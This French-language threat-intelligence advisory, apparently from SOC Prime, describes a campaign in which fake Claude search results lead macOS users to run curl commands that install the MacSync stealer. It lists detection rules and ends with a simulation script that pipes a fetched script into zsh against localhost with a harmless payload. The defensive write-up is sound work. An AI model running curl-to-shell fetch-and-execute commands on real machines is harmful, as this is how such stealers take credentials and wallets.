SOC Prime Bias: High

20 Aug 2026 07:28 UTC

De Faux Résultats de Recherche Claude Conduisent les Utilisateurs macOS vers MacSync Stealer

Author Photo
SOC Prime Team linkedin icon Suivre
De Faux Résultats de Recherche Claude Conduisent les Utilisateurs macOS vers MacSync Stealer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs de la menace abusent du malvertising dans les résultats de recherche Google pour rediriger les utilisateurs vers des conversations partagées Claude.ai légitimes contenant des instructions pour exécuter des commandes curl malveillantes. La chaîne d’attaque délivre MacSync, un voleur avancé macOS et RAT conçu pour exfiltrer les identifiants, les secrets du trousseau et les données de portefeuille de cryptomonnaie. Le malware suit une chaîne de destruction complexe en six étapes impliquant une exécution en mémoire et un abus des permissions TCC.

Enquête

Les analystes de Huntress ont enquêté sur la campagne de malvertising après qu’un client a été compromis par un faux guide d’installation de Claude. Les chercheurs ont contourné les protections des attaquants et récupéré un échantillon de logiciel malveillant directement depuis l’infrastructure de l’adversaire. L’enquête a révélé une chaîne d’exécution multi-étapes impliquant un zsh chargeur, un vol de données basé sur AppleScript, et un Mach-O RAT utilisé pour établir la persistance.

Atténuation

Les utilisateurs devraient éviter de copier et d’exécuter des commandes non vérifiées dans Terminal, même lorsque les instructions apparaissent sur des domaines légitimes ou de confiance. Les équipes de sécurité devraient surveiller les curl activités suspectes et le contenu encodé en Base64 dans les processus shell. Des outils comme BlockBlock et LuLu peuvent également aider à détecter les mécanismes de persistance de macOS et les connexions réseau sortantes non autorisées.

Réponse

Si une activité MacSync est détectée, le dispositif macOS affecté doit être isolé immédiatement pour arrêter toute exfiltration de données supplémentaire. Les enquêteurs doivent examiner l’historique des shells et la télémétrie des points de terminaison pour détecter des curl or zsh exécutions non autorisées. Les modifications des permissions TCC doivent également être examinées, ainsi que les LaunchAgents non autorisés et les binaires d’application modifiés, en particulier ceux associés aux portefeuilles de cryptomonnaie.

Flux d’attaque

Détections

Tentative d’exécution de Curl suspecte [MacOS] (via cmdline)

Équipe SOC Prime
19 août 2026

Archive créée dans le dossier temporaire de macOS (via file_event)

Équipe SOC Prime
19 août 2026

IOCs (SourceIP) à détecter : Comment une recherche Google pour Claude a conduit à MacSync

Règles AI SOC Prime
19 août 2026

IOCs (DestinationIP) à détecter : Comment une recherche Google pour Claude a conduit à MacSync

Règles AI SOC Prime
19 août 2026

Résultat de recherche malveillant mène à MacSync Infostealer [Serveur Web]

Règles AI SOC Prime
19 août 2026

Connexion Command & Control Mach-O RAT via WebSockets [Connexion réseau Windows]

Règles AI SOC Prime
19 août 2026

Détection de la campagne de malvertising MacSync utilisant Curl avec le chargeur Zsh [Création de processus Linux]

Règles AI SOC Prime
19 août 2026

Exécution de simulation

Prérequis : Le contrôle préalable du Télémetry & Baseline doit avoir été approuvé.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un diagnostic erroné.

  • Narratif de l’attaque & Commandes : L’adversaire cible l’utilisateur via une fausse mise à jour logicielle (malvertising). Une fois que l’utilisateur exécute la commande fournie dans le terminal, curl récupère un script malveillant. Ce script est immédiatement dirigé vers zsh. Le script contient une chaîne spécifique daemon_function qui est utilisée pour masquer des processus en arrière-plan malveillants. La règle de détection cherche spécifiquement la combinaison de curl, zsh, et la daemon_function chaîne dans la ligne de commande pour identifier cette campagne spécifique.

  • Script de test de régression :

    #!/bin/bash
    # Script de simulation pour la validation de la détection du malvertising MacSync.
    # Cela simule un utilisateur exécutant une commande unique qui récupère et exécute un script.
    
    echo "[+] Démarrage de la simulation MacSync..."
    
    # Nous simulons la commande en créant un script "malveillant" local
    # et en exécutant ensuite le même motif de ligne de commande que cherche la règle.
    
    echo "function daemon_function() { echo 'Exfiltrating data...'; }; daemon_function" > /tmp/fake_payload.sh
    chmod +x /tmp/fake_payload.sh
    
    # C'est exactement le motif : curl + zsh + daemon_function
    # Nous utilisons un sous-shell pour simuler le comportement de redirection
    echo "[+] Exécution de la ligne de commande malveillante..."
    curl -s http://localhost/fake_payload.sh | zsh -s daemon_function
    
    echo "[+] Commande de simulation exécutée."
  • Commandes de nettoyage :

    # Supprimez la charge simulée et les fichiers temporaires.
    rm /tmp/fake_payload.sh
    echo "[+] Nettoyage terminé."